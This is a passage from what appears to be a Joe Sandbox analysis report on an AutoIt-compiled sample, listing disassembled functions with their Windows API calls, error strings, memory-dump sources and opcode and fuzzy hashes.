                                                                      • Opcode Fuzzy Hash: 3845b95a520b1c6db6d0911503631a44aae587312c5f279bb4fe148341b85749
                                                                      • Instruction Fuzzy Hash: 7C519C70A103259BDB10DFACE988BEEBBF4BF45324F148169E45197291E7709941CB61
                                                                      Function 00A2C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00A2C913
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: be6fff0c48c63f89e920c80d6efce394a11944409f3e01227ca0c7e35642982c
                                                                      • Instruction ID: 3ae0f581ef27fe770e2cdc067c9010c83d6792d501b0504f8ed624e27048cc82
                                                                      • Opcode Fuzzy Hash: be6fff0c48c63f89e920c80d6efce394a11944409f3e01227ca0c7e35642982c
                                                                      • Instruction Fuzzy Hash: 7D113D32689316BEF701AB58BC83DAE27ACDF19334B10003AF500A7282D7B05E4053A8
                                                                      Function 00A2ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: 31bf65e4a22e6f36d43859d9a6abcaa763d7082fe901afcabda2e2fd9f625614
                                                                      • Instruction ID: fecf3b83c5b56faa0f81d36a22a793f455db46bcb5a44e353a707c0e96d5e3c3
                                                                      • Opcode Fuzzy Hash: 31bf65e4a22e6f36d43859d9a6abcaa763d7082fe901afcabda2e2fd9f625614
                                                                      • Instruction Fuzzy Hash: F8419665C1025875CB12EBF6888ABCF77A8AF85750F504462E624F3222FB34E655C3E5
                                                                      Function 009DF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 009DF953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A1F3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A1F454
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 767684f6d9d5016411b6ae4400fea46cc13a60ae7e778467f450d882e7772c5b
                                                                      • Instruction ID: e32887da2a9b9ec5d230e4fd9b43f5f0673e450d80536fbcf2497c1de39f6163
                                                                      • Opcode Fuzzy Hash: 767684f6d9d5016411b6ae4400fea46cc13a60ae7e778467f450d882e7772c5b
                                                                      • Instruction Fuzzy Hash: 9A412A30A48BC0BEC739CB2988B976A7B95BB46360F14C43EE09B56B64D635A8C1C711
                                                                      Function 00A52D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00A52D1B
                                                                      • GetDC.USER32(00000000), ref: 00A52D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A52D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A52D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A52D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A52D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A55A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A52DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A52DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: fd586f3dea595a75a1a2b13a677c0a7f7231fb16b8f89cb5e1a1ff3846c20dbe
                                                                      • Instruction ID: ba27686fa9750dd47c8310d09ac92ca67f92ebb7c3476b7364c0d7277b23362c
                                                                      • Opcode Fuzzy Hash: fd586f3dea595a75a1a2b13a677c0a7f7231fb16b8f89cb5e1a1ff3846c20dbe
                                                                      • Instruction Fuzzy Hash: 93317C72201314BFEB118F50DC8AFEB3BA9FF0A726F044055FE08AA295C6759C51CBA4
                                                                      Function 00A25622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 6b31a505825406c2427ccdbee23fbcf64827f92d111f919c041eed0ec94c93f8
                                                                      • Instruction ID: 26085453b9522d1b021574b408eee4cdac33ada9f945fafe9c592f017927ca58
                                                                      • Opcode Fuzzy Hash: 6b31a505825406c2427ccdbee23fbcf64827f92d111f919c041eed0ec94c93f8
                                                                      • Instruction Fuzzy Hash: E821C671E41A69BFD2159639AE82FFB335CBF61385F480430FD049A685F731ED1481A5
                                                                      Function 00A44FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: ed4439f7952251cd6e38b6d9a865616cf06fe4867fd2995f4bc777128d3a9101
                                                                      • Instruction ID: 66c57d26816538262c30e8bd052666d73ad59977d80c6481e1add6e713b8f2e1
                                                                      • Opcode Fuzzy Hash: ed4439f7952251cd6e38b6d9a865616cf06fe4867fd2995f4bc777128d3a9101
                                                                      • Instruction Fuzzy Hash: BCD1C579E0060AAFDF10DFA8C891FAEB7B5BF88344F148569E915AB282D770DD41CB50
                                                                      Function 00A01522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A015CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A01651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A017FB,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A016E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A016FB
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A01777
                                                                      • __freea.LIBCMT ref: 00A017A2
                                                                      • __freea.LIBCMT ref: 00A017AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: df0acc829f2e39c598079b7c7b229ba022d2c37f0aa1e7c66fe3b1b8c73fdc8a
                                                                      • Instruction ID: 629e0004947073b9f5506804952b5f74fe37e01b65e9784bb4216b1ebf6cb7ec
                                                                      • Opcode Fuzzy Hash: df0acc829f2e39c598079b7c7b229ba022d2c37f0aa1e7c66fe3b1b8c73fdc8a
                                                                      • Instruction Fuzzy Hash: 09919471E0021E9FDB208FA4ED81AEEBBB5AF89710F584659E901EB1C1D735DD41CB60
                                                                      Function 00A44523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: 22306c7e0c54c3453b05f4c441ffc1e919f5aef9924f3f97626d60781ca4d99a
                                                                      • Instruction ID: cd9bb8ef91f97c671ab755a0fe3dd8f82b637ed3391e92d5b168b65f2df538ab
                                                                      • Opcode Fuzzy Hash: 22306c7e0c54c3453b05f4c441ffc1e919f5aef9924f3f97626d60781ca4d99a
                                                                      • Instruction Fuzzy Hash: 10917275A00215AFDF20CFA5C848FAEBBB8FF8A715F108559F515AB280D7709945CFA0
                                                                      Function 00A31187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00A3125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A31284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00A312A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A312D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A3135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A313C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A31430
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: 4025e9494cf38acc666529072f318f4801f2263f50ea828acf56d4b1e4678b40
                                                                      • Instruction ID: 5d9bcf18b03634654ca06409898b0f307ff6321dab347a39eaad49e0db749a0d
                                                                      • Opcode Fuzzy Hash: 4025e9494cf38acc666529072f318f4801f2263f50ea828acf56d4b1e4678b40
                                                                      • Instruction Fuzzy Hash: 7791BBB5A00308AFDB00DFA8C895BBEB7B5FF44325F108029F911EB291D774A942CB90
                                                                      Function 009D948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 08e8478a1b84f8c9d9a214b3797e506c710d3f5f2b1d9d0c612bd0a7162af22d
                                                                      • Instruction ID: 70415f35a4ce1a9c5d3f7eed90e31ca86ee71d06b5038d509390a16091849ac3
                                                                      • Opcode Fuzzy Hash: 08e8478a1b84f8c9d9a214b3797e506c710d3f5f2b1d9d0c612bd0a7162af22d
                                                                      • Instruction Fuzzy Hash: B3913771D44219EFCB10DFA9CC84AEEBBB8FF49320F148556E915B7251D378AA42CB60
                                                                      Function 00A43947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00A4396B
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00A43A7A
                                                                      • _wcslen.LIBCMT ref: 00A43A8A
                                                                      • VariantClear.OLEAUT32(?), ref: 00A43C1F
                                                                        • Part of subcall function 00A30CDF: VariantInit.OLEAUT32(00000000), ref: 00A30D1F
                                                                        • Part of subcall function 00A30CDF: VariantCopy.OLEAUT32(?,?), ref: 00A30D28
                                                                        • Part of subcall function 00A30CDF: VariantClear.OLEAUT32(?), ref: 00A30D34
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4137639002-1221869570
                                                                      • Opcode ID: afa310e06178d14d85dfb3fac40ab348b707146ea6197e9d1a7020976a227c1e
                                                                      • Instruction ID: 54c6768444538cf74f5112b348755246efae473b8d92413e90ef840e52365534
                                                                      • Opcode Fuzzy Hash: afa310e06178d14d85dfb3fac40ab348b707146ea6197e9d1a7020976a227c1e
                                                                      • Instruction Fuzzy Hash: C3912575A083059FCB00EF64C481A6AB7E5FBC8314F14896DF88A97351DB31EE06CB92
                                                                      Function 00A44BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A2000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?,?,00A2035E), ref: 00A2002B
                                                                        • Part of subcall function 00A2000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20046
                                                                        • Part of subcall function 00A2000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20054
                                                                        • Part of subcall function 00A2000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?), ref: 00A20064
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A44C51
                                                                      • _wcslen.LIBCMT ref: 00A44D59
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A44DCF
                                                                      • CoTaskMemFree.OLE32(?), ref: 00A44DDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 614568839-2785691316
                                                                      • Opcode ID: c7c2c8256a6a2f17b022e6cbab837743fbf747f9861af4d59d51a3447b9acfa9
                                                                      • Instruction ID: f392a8b7e3cdb4b011822ed0c9fba58127139b6a80f8b9bdfb54f8d512d1dd72
                                                                      • Opcode Fuzzy Hash: c7c2c8256a6a2f17b022e6cbab837743fbf747f9861af4d59d51a3447b9acfa9
                                                                      • Instruction Fuzzy Hash: 28912371D0021DAFDF10DFA4D891FEEB7B9BF88314F10816AE915A7241EB309A458FA1
                                                                      Function 00A520FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 00A52183
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00A521B5
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A521DD
                                                                      • _wcslen.LIBCMT ref: 00A52213
                                                                      • GetMenuItemID.USER32(?,?), ref: 00A5224D
                                                                      • GetSubMenu.USER32(?,?), ref: 00A5225B
                                                                        • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
                                                                        • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
                                                                        • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A522E3
                                                                        • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 4196846111-0
                                                                      • Opcode ID: d1a3b2af0cb5f5e15b59efa53703edb66697f80fd6695f2ce21e2541ffbed102
                                                                      • Instruction ID: 71d2d517eef75bd4ca1e6d98441ccd1ffdd425eaccd3cf7c9ffcf1cbb3644b4e
                                                                      • Opcode Fuzzy Hash: d1a3b2af0cb5f5e15b59efa53703edb66697f80fd6695f2ce21e2541ffbed102
                                                                      • Instruction Fuzzy Hash: 6A717E75E00205AFCB10DFA4C885BAEB7F1FF89321F148469E816EB341D734AE468B90
                                                                      Function 00A2AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00A2AEF9
                                                                      • GetKeyboardState.USER32(?), ref: 00A2AF0E
                                                                      • SetKeyboardState.USER32(?), ref: 00A2AF6F
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A2AF9D
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A2AFBC
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A2AFFD
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A2B020
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: e2412235ef9ed417ed04b6e42b3f461fcb77260eb78860e0a0b5d7211ba1028b
                                                                      • Instruction ID: 98b8c205a8aacec8425306c9af26ad7a17d41661f46e417403d8b27392f679ff
                                                                      • Opcode Fuzzy Hash: e2412235ef9ed417ed04b6e42b3f461fcb77260eb78860e0a0b5d7211ba1028b
                                                                      • Instruction Fuzzy Hash: D051E4A06187E53EFB37833C9D45BBA7FE95B06304F0884A9E1D9558C2C398ADC4D761
                                                                      Function 00A2ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00A2AD19
                                                                      • GetKeyboardState.USER32(?), ref: 00A2AD2E
                                                                      • SetKeyboardState.USER32(?), ref: 00A2AD8F
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A2ADBB
